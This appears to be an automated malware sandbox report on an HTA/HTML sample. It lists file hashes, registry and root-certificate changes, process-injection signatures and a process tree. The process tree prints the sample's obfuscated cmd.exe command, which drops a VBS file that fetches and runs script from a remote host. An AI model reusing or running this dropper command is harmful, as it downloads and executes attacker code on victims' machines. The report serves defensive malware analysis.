Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
160s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23/01/2024, 09:55
Static task
static1
Behavioral task
behavioral1
Sample
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
Resource
win10v2004-20231215-en
General
-
Target
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
-
Size
7KB
-
MD5
f3ab9f8fe8995462c3245f10ed76ae4f
-
SHA1
6aa8e54760bcc9aa7402e75d7cb33011e0673f7f
-
SHA256
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987
-
SHA512
68d097848803e6c9f009ee41da373b5ce1136e40c750c0c704a137ca1a11bd483dc1f06089e9eb9310b47ee7232ac6bc8ad6c302bbe064765f266efef579848b
-
SSDEEP
192:CzHyJ1AwYaKyJ0VmW98+n6z39EPHzyKQSOOUHdLqmTlphHBLmBdexU+4ur6kUjRd:CzyJ1pROT
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 2676 WScript.exe 8 2676 WScript.exe 10 2676 WScript.exe 12 2676 WScript.exe 14 2676 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 105b3882e24dda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412165656" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d80bef292bee784c8e3c940d61fdfeb8000000000200000000001066000000010000200000000fdd14ee92437bb930b1873b9c5e850c1d61695358a9d90a500ce8522c32b02b000000000e8000000002000020000000302cc06f9bbeab91d604e96d6153836acfaf496d42ba647c48f810e969ad77cd20000000e36b697876da3f329ae85690cd84e8891a00988514c21764ed9786c843f16c3f40000000f7fb677190292754f5ee1bfd2119e80c57ef43cbc336269931261525bbd87d731ce618d22656369183502a07d04e8aa4fa7ddeb77a094aa13a643912b69a3c8b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{ACB40E71-B9D5-11EE-B754-4A7F2EE8F0A9} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d80bef292bee784c8e3c940d61fdfeb800000000020000000000106600000001000020000000491a20a01a29a46b39cb22985fd8bb6eb5d770f9780f0f17d14509cabb57e657000000000e800000000200002000000028e0a22f58412ef4f042aa81542869fbcfcc526701a572bc2b6146139488356290000000f26935c39d53d30fa186d73ef9270315a71c95fbf511f330cc122f01daa49429f9e00b5e9963035037f09c58a97dae50a65310effb9b6ff9e47c6d27dc3702aa196ec159c639bf362bb27bf7c0012c8497b0b8285bf1f9c418adcfccc966eb92507c3533fe8f457f0a19defddfba65c10750061f8775d5b9052811e811c9812a86ba8eb5b28d7cb1c091994e3e6c8a4e40000000e7692a59aa5ebf97b934fb2ed3e6224ea4d67f4037b02234f2e9457dc8ab2c5eca43bd67c6d6368133f69cebc64ef339054de9602c121699b6dc2666b6597cef iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 WScript.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2236 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2236 iexplore.exe 2236 iexplore.exe 2840 IEXPLORE.EXE 2840 IEXPLORE.EXE 2840 IEXPLORE.EXE 2840 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2236 wrote to memory of 2840 2236 iexplore.exe 28 PID 2236 wrote to memory of 2840 2236 iexplore.exe 28 PID 2236 wrote to memory of 2840 2236 iexplore.exe 28 PID 2236 wrote to memory of 2840 2236 iexplore.exe 28 PID 2840 wrote to memory of 2764 2840 IEXPLORE.EXE 29 PID 2840 wrote to memory of 2764 2840 IEXPLORE.EXE 29 PID 2840 wrote to memory of 2764 2840 IEXPLORE.EXE 29 PID 2840 wrote to memory of 2764 2840 IEXPLORE.EXE 29 PID 2764 wrote to memory of 2756 2764 cmd.exe 31 PID 2764 wrote to memory of 2756 2764 cmd.exe 31 PID 2764 wrote to memory of 2756 2764 cmd.exe 31 PID 2764 wrote to memory of 2756 2764 cmd.exe 31 PID 2756 wrote to memory of 2676 2756 cmd.exe 32 PID 2756 wrote to memory of 2676 2756 cmd.exe 32 PID 2756 wrote to memory of 2676 2756 cmd.exe 32 PID 2756 wrote to memory of 2676 2756 cmd.exe 32
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2236 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c EcHo Z5ceEsS49="." : FunctIon Tji57(H27N20):NiF24 = Array(":","t","r","c","1"):Tji57 = NiF24(H27N20):end function :: fm6fciL34 = "S"+ Tji57(3) +"rip"+ Tji57(1) + Tji57(0) + "hT"+ Tji57(1) +"ps://contdlk"+Z5ceEsS49+"bounceme"+Z5ceEsS49+"net/g1":eval("Ge"+ Tji57(1) +"Obje"+ Tji57(3)+ Tji57(1) +"(fm6fciL34)") > nul > C:\Users\Public\^dmpRBh785.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs3⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
\??\c:\windows\SysWOW64\cmd.exec:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs4⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"5⤵
- Blocklisted process makes network request
- Modifies system certificate store
PID:2676
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD5796328dd251a50d733f86c5443acd277
SHA19ce7a6e6d771065b975553ce9b3b7897792506f5
SHA256ec6ccda75d00a9581c13b6651a33dee8d6e122f1c647d2f856c5834905f0599b
SHA5126ddc3cabcdc774d5f59a66119eab0821d307c1d6477757cfce9e5e4c44739ce1496d799ee42f9f0aa0ff02842656c2f55f888ca71c930731cdf3f49344f19572
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c38297afa33483947804f67fa5a34ddf
SHA1c296a71243aabc7d70455138678d55b95a29a23e
SHA2560b28b4489e9b7098d44803e71b28880ac789fb765daee42b8389610bdef558c7
SHA5120985b06324c884cdfb1a46cdb3c242629cac2148fdd2b412f5706642dc959f4dc3c42374677947ec7e09090523a16d20d8c0ccbc1a9a1e3153349949acdc7dcb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD57cfa0a09bd6cc40cd310c972d18587b9
SHA1c05cd7a8bea21a1125debb915fd4e74cab0a2fb6
SHA2565f26224d044e297ebda777ff6afdf5d88c81b57cb3dd2818dea00c507d503859
SHA512a7949fb3daa693e86d2c8470be043c32103aa435e989545bb79ae5899bf3d820eb5818cfdb02f4c8921f1ce2687bf05510c1ebcde5e0f8fb95cd88b80895184e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5eba23a6c1190f115214650a2ac189e81
SHA1d464a6f8646138c73d757b991763b9a78125092c
SHA256be69efaa8993d529fdaa83ca574d1267568ac4e8bdced8e89fe6c1bdcd648c30
SHA512a458e9cdd3dfb96c3930cb57eed7ad516b1385f07bc96883fa54f66eee4e1e1a2a2cf94f1f74532a7c2a8c2e42e1601066f651e84cc5074fd84df620665e5f64
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD518e3ed868b404f84177cb7127a135140
SHA1ba9bcd386ddf694b84360af4d0dac95643916795
SHA256bd91c5d942faf5e0f7e4b9625b8147e71f354f9901a06d19f27034578039c73c
SHA512b8f814a254c0aed79d6edbe4e1b15801fd9a20fb6831a303a7b62fc2519370eb8117586edad622ffa4128951068e71d1858a3eba7bf15d2bb3b11ab79f7206dc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5799b1d2dda9883a713b7738272071e11
SHA132d918afafe052b97af9d523f42d4810826303d9
SHA25665d53ed92319dced13f84991ce3c452bd04e86704374300c5774d0e53d53f190
SHA512105fa1e808401abc1a54f8ca1ae902b7f477b399458c6b28d9ba1276d06c79b9363666589feef1fa13153082316360ab9b7f482f339cf1b316f4b59db539b942
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f4b24b50677b133e5887cbae6a61dd28
SHA1a16673dcbfea86af008aa8c6694db584e7fde953
SHA256f5e96da1739dcf5128b2961e4c47a73f56acd5e5ba6fd03404d7b76ed7fdf411
SHA51255230e181e43d55e4da52c2c8f75d183d1d2acc6a6f874e6fd0f490189c18fe55bd797830cf0aeac24b5d1bcc82fe7daa44ab10d1bb3e32c80304c0084e6393d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ae2634f2a685eb835f109750b363dbbd
SHA1922d4adde6eeb1c82761dfdac279078fbfd0c8ae
SHA256ab29a09e9b2857a0e1803c41ee194bd9d2f32f510aa9d687a1699782e796ecef
SHA51238971f2d2e06d1a4894c1412d16c0732158a2a76543f563e7de49786c0df50d813a5dac30df7233ca30c9849c7fe4e5d3cb47dca5f6d78f3f5ff1ce3c5b8b2f7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ca24fbe6638a2fcbe6b1120b9ae69a8c
SHA142ccc1528e4b3179616882fec121bbdc319c4fc1
SHA25688483d35bbf73ef5ebc9d495077203ceb9ff9ceff86253901e2e66fbdb6be43a
SHA512fc3360a6710e2bcb4d6741c4ca55e6161b737a3ff6e5a74823e43987210b39bdbe01c09d27c4b06b6a9e0d1debbb89969503c7054a19acc73c9af58e7864cd1d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5d11911ee2bd9616a4d296af4f9df9dac
SHA1014c510122fe948de796507abfa06493e1e28a51
